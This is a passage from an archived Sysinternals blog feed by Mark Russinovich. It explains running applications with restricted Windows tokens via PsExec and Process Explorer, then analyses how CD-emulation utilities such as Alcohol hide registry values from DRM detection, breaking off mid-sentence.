“-l –d“ and the path to Outlook (e.g. C:\Program Files\Microsoft Office\Office11\Outlook.exe) to the text in the Target field. Finally, select Change Icon, navigate to the Outlook executable and choose the first icon. Activating the shortcut will result in a Command Prompt window briefly appearing as PsExec launches the target with limited rights. <BR /> <BR /> Both Process Explorer and PsExec use the <A href="#" mce_href="#" target="_blank"> CreateRestrictedToken </A> API to create a security context, called a token, that’s a stripped-down version of its own, removing administrative privileges and group membership. After generating a token that looks like one that Windows assigns to standard users Process Explorer calls CreateProcessAsUser to launch the target process with the new token. <BR /> <BR /> You can use Process Explorer itself to compare the token of a process running with full administrative rights and one that’s limited by viewing the Security tab in the Process Properties dialog. The properties on the left are for an instance of IE running in an account with administrative group membership and the one on the right for IE launched using Run as Limited User: <BR /> <BR /> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482372/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482372/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120933i9E01D5322DDB0993" /> <BR /> <BR /> The privilege lists immediately stand out as different because the limited-user token has so few privileges. Process Explorer queries the privileges assigned to the Users group and strips out all other privileges, including powerful ones like SeDebugPrivilege, SeLoadDriverPrivilege and SeRestorePrivilege. <BR /> <BR /> The difference between the group lists is more subtle: both tokens contain the Builtin\Administrators group, but the group has a Deny flag in the limited-user version. Fully understanding the effect of that flag requires a quick background on the Windows security model. <BR /> <BR /> Windows stores an object’s permissions in a Discretionary Access Control Lists (DACL) that consists of zero or more Access Control Entries (ACEs). Each ACE specifies the user or group to which it applies, a type of Allow or Deny and the accesses (e.g. read, delete) it allows or denies. When a process tries to open an object Windows normally considers each ACE in the object’s DACL that matches the user or any of the groups in the process’ token. However, when the Deny flag is present on a group that group is only used by during a security access check to deny access to objects, never to grant access. <BR /> <BR /> CreateRestrictedToken marks groups you don’t want present in the resulting token with the Deny flag rather than removing them altogether to prevent the security hole doing so would create: a process using the new token could potentially access objects for which the removed groups have been explicitly denied access. Users would therefore be able to essentially bypass permissions by using the API. Consider a directory that has permissions denying the Builtin\Administrators account access, but allows Mark access. That directory wouldn’t be accessible by the original instance of IE above, but would be accessible by the limited user version. <BR /> <BR /> The result of running applications as limited user is that malware invoked by those applications won’t be able to modify system settings, disable antivirus or antispyware, install device drivers, or configure themselves in system-wide autostart locations. <BR /> <BR /> There are some limitations, however: because the limited-user processes are running in the same account and on the same desktop as other processes running with administrative privileges, sophisticated malware could potentially inject themselves into more privileged processes or remotely control them using Windows messages. When it comes to security, there’s no single cure all and every layer of protection you add could be the one that eventually saves you or your computer. <BR /> <BR /> Next post I’ll take a look inside Vista’s UAC to see how it uses the same approach as Process Explorer and PsExec, but leverages changes to the Windowing system and process object security model to better isolate limited-user processes from those running with higher privilege. <BR /> <DIV style="CLEAR: both; PADDING-BOTTOM: 0.25em"> </DIV> <BR /> <I> Originally by Mark Russinovich on 3/2/2006 10:29:00 AM </I> <BR /> <I> Migrated from original Sysinternals.com/Blog </I> <BR /> </BODY></HTML> Thu, 27 Jun 2019 06:27:23 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/running-as-limited-user-the-easy-way/ba-p/723506 TechCommunityAPIAdmin 2019-06-27T06:27:23Z Using Rootkits to Defeat Digital Rights Management https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/using-rootkits-to-defeat-digital-rights-management/ba-p/723502 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Feb 06, 2006 </STRONG> <BR /> The <A href="#" mce_href="#" target="_blank"> Sony rootkit debacle </A> highlighted the use of rootkits to prevent pirates and authors of CD burning, ripping, and emulation utilities from circumventing Digital Rights Management (DRM) restrictions on access to copyrighted content. It’s therefore ironic, though not surprising, that several CD burning and disc emulation utilities are also using rootkits, though the technology is being used in the opposite way: to prevent DRM software from enforcing copy restrictions. <BR /> <BR /> Because PC game CDs and DVDs do not need to be compatible with set-top players software vendors can store data on media in unorthodox ways that require software support to read it. Attempts to make a copy of such media without the aid of the software results in a scrambled version and the software has DRM measures to detect and foil unauthorized copying. <BR /> <BR /> CD burning and emulation software companies owe a significant amount of their sales to customers that want to store games on their hard drives. The legitimate claim for doing this is that it enables fast, cached access to the game., though it is well known that this is also used to make illegal copies of games to share with friends - so content-protected CDs and DVDs present a challenge the companies can’t ignore. One way to deal with the problem is to re-engineer the software that interprets the data stored on the media, but that approach requires enormous and on-going resources dedicated to deciphering changes and enhancements made to the encoding schemes. <BR /> <BR /> An easier approach is to fool game DRM software into thinking its reading data for playing a game from its original CD rather than from an on-disk copy. DRM software uses a number of techniques to try to defeat that trick, but a straightforward one is simply to detect if CD emulation software is present on the system and if so, if the game is being run from an on-disk emulated copy. That’s where rootkits come in. Two of the most popular CD emulation utilities are <A href="#" mce_href="#" target="_blank"> Alcohol </A> and <A href="#" mce_href="#" target="_blank"> Daemon Tools </A> and they both use rootkits. <BR /> <BR /> Alcohol advertises itself as enabling you “to make a duplicate back-up to recordable media of nearly all your expensive Game/Software/DVD titles, and/or an image that can be mounted and run from any one of Alcohol's virtual drives”. When you run a <A href="#" mce_href="#" target="_blank"> RootkitRevealer </A> scan of a system on which Alcohol is installed you see several discrepancies: <BR /> <BR /> <IMG original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482319/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120921i7F7A9A073AEC9B02" /> <BR /> <BR /> The first two are data mismatches whereas the last one is a key that’s hidden from Windows. A data mismatch occurs when RootkitRevealer obtains a different value from a Registry API than it sees when it looks at the raw Registry data where the value resides. When you view either of the values in Regedit they appear to be composed of sequences of space characters: <BR /> <BR /> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482320/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482320/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120922iCFC5DC319093C84D" /> <BR /> <BR /> Why would Alcohol want to use data mismatching rather than the typical cloaking technique to hide the value altogether? The values in question are located in HKLM\Software\Classes\Installer\Products and HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall and both areas are where applications store information for use by the Windows Add/Remove Programs (ARP) utility. ARP uses the ProductName value in an application’s Products key as the name it displays in its list of installed applications so an empty value implies that we should see a product with no name in the list. However, a quick look shows that there are no missing names and we know that the value is associated with Alcohol, but it shows up in the list: <BR /> <BR /> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482321/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482321/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120923i24E0EDC0A349A633" /> <BR /> <BR /> Using <A href="#" mce_href="#" target="_blank"> Regmon </A> to capture a Registry activity trace of ARP, which as a Control Panel applet is implemented as a DLL hosted by Rundll32.exe, confirms that ARP reads displayed Alcohol text from the mismatched ProductName value whereas Regedit sees only empty data for the same value: <BR /> <BR /> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482322/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/482322/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120924i7901EFB80BFED9B0" /> <BR /> <BR /> The other mismatched value behaves the same way and it’s my guess that Alcohol masquerades strings that identifies its presence on a system from anything but ARP in order to avoid detection by DRM software like that included in games that disable themselves in th